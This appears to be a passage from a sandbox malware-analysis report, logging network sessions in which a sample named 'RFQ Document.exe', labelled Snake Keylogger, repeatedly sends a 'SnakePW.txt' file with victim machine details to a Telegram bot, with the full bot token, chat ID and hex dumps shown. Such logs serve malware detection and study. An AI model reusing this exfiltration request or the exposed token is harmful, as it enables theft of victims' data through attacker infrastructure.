2021-09-28 05:58:25 UTC	34	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c46f4cca Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:25 UTC	35	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 36 66 34 63 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c46f4ccaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:25 UTC	35	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:25 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:25 UTC	36	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12602,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
220	192.168.2.4	50041	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:32 UTC	349	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ecbba305 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:32 UTC	350	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 62 62 61 33 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ecbba305Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:32 UTC	350	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:32 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:32 UTC	350	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12806,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
221	192.168.2.4	50042	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:32 UTC	351	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ecd11949 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:32 UTC	351	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 64 31 31 39 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ecd11949Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:32 UTC	352	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:32 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:32 UTC	352	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12807,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
222	192.168.2.4	50043	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:32 UTC	352	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ecf01548 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:32 UTC	353	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 66 30 31 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ecf01548Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:33 UTC	353	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:33 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:33 UTC	354	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12808,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
223	192.168.2.4	50044	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:33 UTC	354	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ed07eda7 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:33 UTC	354	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 30 37 65 64 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ed07eda7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:33 UTC	355	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:33 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:33 UTC	355	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12809,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
224	192.168.2.4	50045	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:33 UTC	356	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ed249e37 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:33 UTC	356	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 32 34 39 65 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ed249e37Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:33 UTC	356	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:33 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:33 UTC	357	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12810,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
225	192.168.2.4	50046	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:33 UTC	357	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ed3c6155 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:33 UTC	358	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 33 63 36 31 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ed3c6155Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:33 UTC	358	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:33 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:33 UTC	358	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12811,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
226	192.168.2.4	50047	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:33 UTC	359	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ed5b5f3d Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:33 UTC	359	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 35 62 35 66 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ed5b5f3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake 